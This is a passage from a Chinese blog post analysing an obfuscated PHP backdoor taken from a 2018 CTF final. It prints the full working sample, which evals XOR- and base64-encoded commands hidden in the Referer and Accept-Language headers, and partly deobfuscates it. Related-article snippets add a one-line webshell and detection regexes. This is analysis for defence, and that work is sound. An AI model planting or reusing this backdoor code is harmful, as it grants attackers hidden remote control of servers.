PHP混淆后门解剖分析(反抓流量、加密结果)

最新推荐文章于 2024-07-08 12:11:58 发布
最新推荐文章于 2024-07-08 12:11:58 发布
阅读量2.5k 收藏 1
点赞数
文章标签: PHP 混淆马 后门 PHP木马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/publicStr/article/details/80635752
版权
本文深入剖析了一个PHP混淆后门,详细解释了其解混淆过程、参数解析、正则表达式玄机、MD5处理、执行流程等关键步骤,揭示了后门如何通过复杂手段隐藏真实意图并防止轻易被逆向分析。
摘要由CSDN通过智能技术生成

开始前的例行叨叨:

这个后门样本收集于2018红帽杯线下决赛,看到有其他分析收集于自己的服务器,悲剧了(手动笑哭),貌似蓝帽杯也有。

调试了很久,被逼着专门学了半天正则表达式,但感觉写完这篇文章就忘干净了。

马的特殊性就是,靠特别麻烦,让你在现场心态崩溃,调试不出来,而且抓到流量不会打,直接打过去也看不懂结果6666

(手动滑稽)



后门源码

<?php
$s='=0;pw($pwj<$c&&$ipw<$l);$jpw++pw,$i++){$opw.=$pwt{$i}^$k{$j}pw;}}repwpwturn pw$o;}$r=$_SERVEpwR;$pwpwrr=@$r["HpwTTP_REpwpwFE';
$I='m[2]pw[$z]];ipwf(strpopwspw($p,$h)pw===0){$s[$pwpwi]="";$pwppw=$ss($p,3);}if(apwrray_pwkey_existpws($i,$pws)){pw$s[$i].pw=$p;';
$U='$epw=strppwpwos($s[$ipw],$f);ipwfpw($e){pw$k=$pwkpwh.$kf;ob_start();@evpwapwl(@gzuncpwpwompress(@x(@baspwepw64_decpwpwode(';
$d=str_replace('pF','','cpFreapFtepFpF_pFfuncpFtion');
$Q='preg_replapwce(arrapwypwpw("/_/","/-/"),array("pw/"pw,"+"),pwpw$ss($s[pw$i],0pw,$e))),$k)));pw$opw=ob_gepwt_pwcopwpwntents();o';
$O='b_end_clean(pw);$d=bpwase64pw_epwncode(x(gzcompwpress($opw),$pwk));pripwntpw("<$kpw>$d</$k>");@sespwpwspwion_destroy();}}}}';
$y='RERpwpw"];$ra=@$r["HTTP_ACCEPTpwpw_LANGUAGE"];pwifpw(pw$rr&&$ra)pw{$u=parsepw_urlpw($rr);parspwe_str($upw["qpwupwery"],$q);';
$X='$q=pwapwrray_values(pwpw$q);preg_mpwatchpw_alpwl("/([\\w])[pw\\wpw-]+(?:;q=0.(pw[pw\\d]))?,?/pw",$rpwpwa,$m);pwif($q&&$m){@';
$b='sespwsion_stapwrt();$pwspw=&$_SESpwSpwION;$pwss="spwubpwstr";$sl="pwstrtolopwwer";$i=$m[1][0]pwpw.$m[1][1];pw$h=$sl(pwpw$s';
$q='pws(md5($i.$kh)pw,0,3));$fpwpw=$pwsl($ss(md5($i.$kfpw),0pwpw,3));$p="pw";fopwr($zpw=1;$z<count($m[1pwpw]);$pwz++)$p.=$pwq[$';
$W='$kh="d6a6";pw$kf=pw"bc0d";pwfupwnction x($pwt,$pwkpw){$c=spwtrlen($k);$l=pwpwstrlen($t);pwpw$o="pw";for($i=0pw;$i<$l;){fopwr($j';
$j=str_replace('pw','',$W.$s.$y.$X.$b.$q.$I.$U.$Q.$O);
$u=$d('',$j);$u();
?>



经过Debug调试,解混淆




解混淆后的源码

<?php
$kh = "d6a6";
$kf = "bc0d";
function x($t, $k)
{
    $c = strlen($k);
    $l = strlen($t);
    $o = "";
    for ($i = 0; $i < $l; ) {
        for ($j = 0; ($j < $c && $i < $l); $j++, $i++) {
            $o .= $t{$i} ^ $k{$j};
        }
    }
    return $o;
}
$r  = $_SERVER;
$rr = @$r["HTTP_REFERER"];
$ra = @$r["HTTP_ACCEPT_LANGUAGE"];
if ($rr && $ra) {
    $u = parse_url($rr);
    parse_str($u["query"], $q);
    $q = array_values($q);
    preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/", $ra, $m);
    if ($q && $m) {
        @session_start();
        $s =& $_SESSION;
        $ss = "substr";
        $sl = "strtolower";
        $i  = $m[1][0] . $m[1][1];
        $h  = $sl($ss(md5($i . $kh), 0, 3));
        $f  = $sl($ss(md5($i . $kf), 0, 3));
        $p  = "";
        for ($z = 1; $z < count($m[1]); $z++)
            $p .= $q[$m[2][$z]];
        if (strpos($p, $h) === 0) {
            $s[$i] = "";
            $p     = $ss($p, 3);
        }
        if (array_key_exists($i, $s)) {
            $s[$i] .= $p;
            $e = strpos($s[$i], $f);
            if ($e) {
                $k
最低0.47元/天 解锁文章
publicStr
关注
php后门拿下当前目录
aici0819的博客
03-26 389
Weevely是一个模拟类似telnet的连接的隐形PHP网页shell。它是Web应用程序后期开发的必备工具,可以作为隐形后门程序,也可以作为一个web外壳来管理合法的Web帐户,甚至可以免费托管。 weevely是一款针对PHP的webshell的自由软件,可用于模拟一个类似于telnet的连接shell,weevely通常用于web程序的漏洞利用,隐藏后门或者使用类似tel...
php后门查询工具
11-03
php源码修改工具,欢迎分享,有需要的下载把,请大家给个好评,谢谢了
如何有效查看PHP源码以检测潜在后门
最新发布
2401_86114092的博客
07-08 506
这些后门通常被设计得非常隐蔽,可能隐藏在正常的代码中,或者通过混淆加密等手段进行伪装。在查看PHP源码时,我们需要检查所有与数据库相关的代码段,特别是那些用于插入、更新和删除数据的操作。在阅读过程中,我们需要特别关注那些与文件操作、数据库连接、系统命令执行等相关的代码段,因为这些地方是后门最可能隐藏的地方。因此,在查看源码时,我们需要特别注意这些代码段,并检查它们是否包含或执行了不可信的外部文件或代码。因此,在查看源码时,我们需要特别注意这些代码段,并检查它们是否可能被用于执行恶意操作。
php代码混淆加密
炉火纯青
12-20 8475
function RandAbc($length=""){//返回随机字符串 $str="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; return str_shuffle($str); } $filepath='index.php'; $path_parts=
混淆 php,php混淆加密/解密
weixin_33746819的博客
03-09 1053
您可能想使用PHP的mcrypt扩展。function enc_aes($str, $key, $iv) {$aes = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_CBC, '');if (!$aes) die("mcrypt_module_open failed!");(mcrypt_generic_init($aes, $k...
php源码混淆加密代码
12-20
修改过的php源码加密代码,支持多文件批量加密加密文件保持原文件名生成于code的目录下
混淆反编译反加密C#DLL文件解密工具.
04-12
本文将详细探讨“反混淆反编译反加密C# DLL文件解密工具”这一主题,以及如何利用它来还原混淆后的代码。 标题中的“反混淆反编译反加密C# DLL文件解密工具”指的是专门用于处理C#编译后的动态链接库(DLL)文件的...
C# Winform 应用程序代码反编译加密混淆工具含Lisense
12-03
XenocodePostbuild2010forNET 可能你一看这个名字就知道了,里面包含Lisense 我的所有资源都是免费的。之前下载别人的都是要分的,凡是要分的,我都下载过来以后再上传到我这里,免费给大家使用
PHP在线混淆加密教程分享+基本无解
没有开通的博客
02-15 3966
正文: 花了点时间写了一个原创PHP加密算法,根据站长我自己思路写的,总共加密了4层以上,以目前来说的话,加密之后的代码理论上是无法被逆向的。 当然,不排除后期会有大佬能够给我解密了,但是由于算法距离我发文章才刚过去一天,大佬们研究也不会这么快的,如果后期被人逆向我也会及时更新算法,这样子就能保证大家代码的安全性了。 关于代码加密的注意事项我需要说一下,代码加密一次之后,就不用在加密第二次了,不然的话会报错,后期算法在慢慢的优化和更新吧。 下面分享一下如何加密PHP文件: 第一步: 打开..
phpscan,php后门扫描神器
08-12
phpscan,php后门扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,里面附详细的使用说明
php版js混淆加密插件
01-03
php版本的js代码混淆加密插件,调用方式见内部注释!凑字数……
反编译被混淆的java_Java代码加密与反编译(一):利用混淆器工具proGuard对jar包加密...
weixin_30199299的博客
02-20 1508
Java 代码编译后生成的 .class 中包含有源代码中的所有信息(不包括注释),尤其是在其中保存有调试信息的时候。所以一个按照正常方式编译的 Java .class 文件可以非常轻易地被反编译。通常情况下,反编译可以利用现有的工具jd-gui.exe或者jad.exe。(这两个反编译工具在我的资源里有下载:有些情况下,为了保护java源码不被别人看到,通常会使用加密手段对java源码进行加密,...
在线检测php后门,php后门简单检测脚本
weixin_36018183的博客
03-09 1372
# coding:utf-8import osimport sysimport rerulelist = ['(\$_(GET|POST|REQUEST)\[.{0,15}\]\(\$_(GET|POST|REQUEST)\[.{0,15}\]\))','(base64_decode\([\'"][\w\+/=]{200,}[\'"]\))','eval\(base64_decode\(','(e...
php后门工具_教你识别简单的免查杀PHP后门
weixin_31684041的博客
03-08 1086
一个最常见的一句话后门可能写作这样或这样tudouya 同学在FREEBUF上给出[一种构造技巧]利用构造生成,当然,嫌太直观可以写作这样然后再填充些普通代码进行伪装,一个简单的”免杀”shell样本就出现了我们再来看看号称史上最简单免查杀php后门直接上代码:$c=urldecode($_GET['c']);if($c){`$c`;}//完整!$_GET['c']||`{$_GET['c']}`...
php后门检测工具,phpStudy后门如何检测和修复
weixin_32331345的博客
03-09 1122
背景一篇《Phpstudy官网于2016年被入*,犯罪分子篡改软件并植入后门》让人触目惊心,从官网的下载官方安装包也会有问题,由此可想而知目前已经有多少网站已经沦陷。接到消息的第一时间,我们对以前从官网下载的一个安装包 phpStudySetup.exe 进行了检测,发现 md5=fc44101432b8c3a5140fcb18284d2797,果然也已经在涉及漏洞的列表中。来自文章的原话:”据主...
PHP混淆加密+递归加密文件
qq_20729891的博客
03-22 1171
背景:因为我们要做saas私有化部署,所以考虑将部署在第三方机器上的代码进行加密 途径:网上找了一个PHP混淆加密(enphp),此加密脚本也是用PHP写的 漏洞:有加密就有解密,漏洞肯定是存在的,比如我一眼就看出来一个: 这个加密方式会将int类型的数字转换为16进制,那么同理,解密也是将16进制转换为10进制。 官方sdk地址:enphp_opensource: 一个开源加密混淆 PHP 代码项目 使用方式:可以点进链接看使用说明。其实很简单,传个参数就行。 更改sdk:因为sdk...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值